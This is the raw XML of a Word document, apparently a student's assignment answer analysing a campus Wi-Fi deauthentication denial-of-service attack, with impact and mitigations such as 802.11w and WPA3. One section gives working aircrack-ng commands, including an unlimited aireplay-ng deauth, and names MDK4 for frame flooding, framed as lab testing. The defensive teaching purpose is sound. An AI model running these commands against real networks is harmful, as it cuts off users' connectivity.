        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="252" w:line="286" w:lineRule="auto"/>
        <w:ind w:left="155" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>The attacker uses automated tools to continuously send deauth packets, leading to denial of service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D8F620" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>1. Understanding of the Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72672135" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="223"/>
        <w:ind w:left="160" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is a classic </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Layer-2 Denial-of-Service (DoS)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attack that exploits a structural weakness in the original 802.11 standard: management frames (including deauthentication and disassociation frames) are transmitted in the clear and are not authenticated. Because any device can forge these frames on behalf of the AP or a client, an attacker does not need to know the Wi-Fi password to disrupt service — they only need to be within radio range, making this attack cheap, fast and hard to attribute to a specific individual on a large, open campus network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7971EA8F" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>2. How Deauthentication Attacks Are Carried Out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224056FA" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The 802.11 standard allows any station to send a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>deauthentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>disassociation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> frame, and pre-WPA3 networks do not cryptographically verify who sent it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1955855F" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The attacker's wireless card is placed in monitor mode and used to sniff the BSSID (AP MAC) and client MAC addresses on the target channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA4B1B" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Spoofed deauth frames are then broadcast, appearing to originate from the legitimate AP, telling every associated client to disconnect immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37500A20" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>Because client devices are designed to auto-reconnect, the attacker repeats this continuously (often via a scripted/automated loop), creating a persistent disconnect-reconnect cycle that prevents any stable session — a targeted or campus-wide denial of service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A133C3" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="349"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:t>This is frequently a precursor to a further attack (e.g. forcing reconnection to an Evil Twin AP), but on its own it is sufficient to cause the reported disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074B7F62" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>3. Simulating and Analysing the Attack with Kali Linux (Controlled Environment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76628746" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="69" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Airmon-ng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Enables monitor mode on the test wireless adapter (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>airmon-ng start wlan0</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEC7CDE" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Airodump-ng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Identifies the target AP's BSSID/channel and lists connected client MAC addresses for the controlled test (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>airodump-ng --bssid &lt;BSSID&gt; -c &lt;channel&gt; wlan0mon</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F34FA" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aireplay-ng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Generates deauthentication frames in a lab/authorized test (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>aireplay-ng --deauth 0 -a &lt;BSSID&gt; wlan0mon</w:t>
      </w:r>
      <w:r>
        <w:t>) to reproduce the exact behaviour reported on campus and measure its effect on connected test clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46203CFA" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MDK4:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A dedicated wireless DoS-testing tool that can flood deauth/disassociation frames at scale to stress-test defences (used strictly in an isolated lab, never on production networks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD01AB6" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wireshark:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Captures and analyses the resulting .pcap to confirm the volume, timing and source MAC pattern of deauth frames, producing forensic evidence to correlate with the helpdesk complaints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139D946F" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="350"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kismet:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Provides continuous monitoring/alerting that can flag abnormal deauth frame rates as they occur on the live campus network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F541169" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>4. Impact on Network Availability and User Productivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772CADA0" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="280" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Availability:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Repeated forced disconnections prevent students/staff from maintaining stable sessions for classes, video conferencing, exams, and library resources during peak hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080DD415" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Productivity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Constant reconnect attempts consume time and device battery, disrupt online assessments, and generate a surge of help-desk tickets, indirectly costing IT staff time as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158DCDF9" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Security Risk:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Users conditioned to repeatedly re-enter Wi-Fi credentials or click through reconnection prompts are more susceptible to a follow-up Evil-Twin or phishing attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23809A" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="350"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reputational Impact:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Frequent, unexplained outages reduce trust in campus IT services among students, faculty and visitors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79098828" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="155"/>
      </w:pPr>
      <w:r>
        <w:t>5. Recommended Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB95C3D" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Enable 802.11w (Management Frame Protection):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cryptographically signs management frames so spoofed deauth/disassociation frames are rejected by compliant clients and APs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B149E26" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Migrate to WPA3:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mandates PMF/802.11w and provides stronger overall protection against this class of attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7103F9BC" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Deploy a Wireless Intrusion Detection/Prevention System (WIDS/WIPS):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detects abnormal deauth frame rates in real time and can trigger automatic alerts, source-tracking, or containment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40908AA5" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Network Configuration Hardening:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Segment SSIDs by building/zone, tune AP power levels and channel plans to reduce the attack's effective range, and enable rate-limiting where supported by AP hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0423C4C5" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Physical &amp; Administrative Controls:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Use signal-strength triangulation to physically locate the rogue device, restrict physical access to sensitive areas, and maintain an incident response playbook for wireless DoS events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B407176" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="105"/>
        <w:ind w:hanging="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Continuous Monitoring:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Integrate wireless controller logs with a SIEM for trend analysis, so recurring peak-hour disruptions are proactively investigated rather than only reactively reported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224DA90A" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="191" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="160" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="136CB7E0" wp14:editId="4CD6BECD">
                <wp:extent cx="5853121" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="9399" name="Group 9399"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5853121" cy="10160"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5853121" cy="10160"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="799" name="Shape 799"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5853121" cy="0"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5853121">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5853121" y="0"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="10160" cap="rnd">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9" style="width:460.876pt;height:0.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="58531,101">
                <v:shape id="Shape 799" style="position:absolute;width:58531;height:0;left:0;top:0;" coordsize="5853121,0" path="m0,0l5853121,0">
                  <v:stroke weight="0.8pt" endcap="round" joinstyle="miter" miterlimit="10" on="true" color="#999999"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="185AB123" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="160" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>End of Answers – All 5 Questions (Total: 100 Marks)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009238FC">
      <w:headerReference w:type="even" r:id="rId10"/>
      <w:headerReference w:type="default" r:id="rId11"/>
      <w:headerReference w:type="first" r:id="rId12"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1328" w:right="1344" w:bottom="1466" w:left="1184"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D504" w14:textId="77777777" w:rsidR="000D13C1" w:rsidRDefault="000D13C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="70168F3D" w14:textId="77777777" w:rsidR="000D13C1" w:rsidRDefault="000D1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3C3E" w14:textId="77777777" w:rsidR="000D13C1" w:rsidRDefault="000D13C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="671AEB74" w14:textId="77777777" w:rsidR="000D13C1" w:rsidRDefault="000D1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5B5E" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="009238F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FE7B" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="009238F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6368" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="009238F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16FC" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-1184" w:right="1056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27F1F0" wp14:editId="237990E8">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>853440</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>731520</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5929321" cy="711200"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="10986" name="Group 10986"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5929321" cy="711200"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="5929321" cy="711200"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="11235" name="Shape 11235"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5929321" cy="711200"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="5929321" h="711200">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="5929321" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="5929321" y="711200"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="711200"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="0" cap="flat">
                          <a:miter lim="127000"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="0">
                          <a:srgbClr val="000000">
                            <a:alpha val="0"/>
                          </a:srgbClr>
                        </a:lnRef>
                        <a:fillRef idx="1">
                          <a:srgbClr val="1A3C6E"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:scrgbClr r="0" g="0" b="0"/>
                        </a:effectRef>
                        <a:fontRef idx="none"/>
                      </wps:style>
                      <wps:bodyPr/>
                    </wps:wsp>
                  </wpg:wgp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <w:pict>
            <v:group id="Group 10986" style="width:466.876pt;height:56pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:67.2pt;mso-position-vertical-relative:page;margin-top:57.6pt;" coordsize="59293,7112">
              <v:shape id="Shape 11236" style="position:absolute;width:59293;height:7112;left:0;top:0;" coordsize="5929321,711200" path="m0,0l5929321,0l5929321,711200l0,711200l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#1a3c6e"/>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6150" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        <w:sz w:val="14"/>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39A0" w14:textId="77777777" w:rsidR="009238FC" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="-1184" w:right="1056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B8CC8E" wp14:editId="118C26E0">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>853440</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>731520</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5929321" cy="711200"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="10974" name="Group 10974"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5929321" cy="711200"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="5929321" cy="711200"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="11233" name="Shape 11233"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5929321" cy="711200"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="0" t="0" r="0" b="0"/>
                          <a:pathLst>
                            <a:path w="5929321" h="711200">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="5929321" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="5929321" y="711200"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="711200"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                            </a:path>
                          </a:pathLst>
                        </a:custGeom>
                        <a:ln w="0" cap="flat">
                          <a:miter lim="127000"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="0">
                          <a:srgbClr val="000000">
                            <a:alpha val="0"/>
                          </a:srgbClr>
                        </a:lnRef>
                        <a:fillRef idx="1">
                          <a:srgbClr val="1A3C6E"/>
                        </a:fillRef>
                        <a:effectRef idx="0">
                          <a:scrgbClr r="0" g="0" b="0"/>
                        </a:effectRef>
                        <a:fontRef idx="none"/>
                      </wps:style>
                      <wps:bodyPr/>
                    </wps:wsp>
                  </wpg:wgp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <w:pict>
            <v:group id="Group 10974" style="width:466.876pt;height:56pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:67.2pt;mso-position-vertical-relative:page;margin-top:57.6pt;" coordsize="59293,7112">
              <v:shape id="Shape 11234" style="position:absolute;width:59293;height:7112;left:0;top:0;" coordsize="5929321,711200" path="m0,0l5929321,0l5929321,711200l0,711200l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#1a3c6e"/>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E27"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1CA66460"/>
    <w:lvl w:ilvl="0" w:tplc="3CB41D60">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6A584F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69EE27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3C5CF4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2E8651F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5010024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2C24CB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0ECCFC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933E54B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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="07992A0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4650DAA2"/>
    <w:lvl w:ilvl="0" w:tplc="3336EEE0">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CF3A89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0E08BB0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9F96CED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8018756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931E82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9A04E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3F68E7D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71680E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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0E8E1639"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8398E69E"/>
    <w:lvl w:ilvl="0" w:tplc="BCDE3C54">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F210EF1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37843F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9DB476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6382CD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EA4C092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0AFA92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B426A9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CE58B80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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="10844BF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9446EC2A"/>
    <w:lvl w:ilvl="0" w:tplc="85045976">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73CE21E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A0BCD2C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0DDC20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9C701B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C3F66F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47ACE4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D436B6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FA6EFF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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="19406FB8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="67D85B20"/>
    <w:lvl w:ilvl="0" w:tplc="70BA1378">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622221F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B7560C8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2D2EC9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FB1C1D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98AA49E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924276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56D0CED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595ECE7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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1A7235B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F3CF3BE"/>
    <w:lvl w:ilvl="0" w:tplc="4A70129C">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54A6D5C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0CD4902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50B48E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8C5635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066827A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78BE6B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A28A31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778CBD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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="214C1619"/>
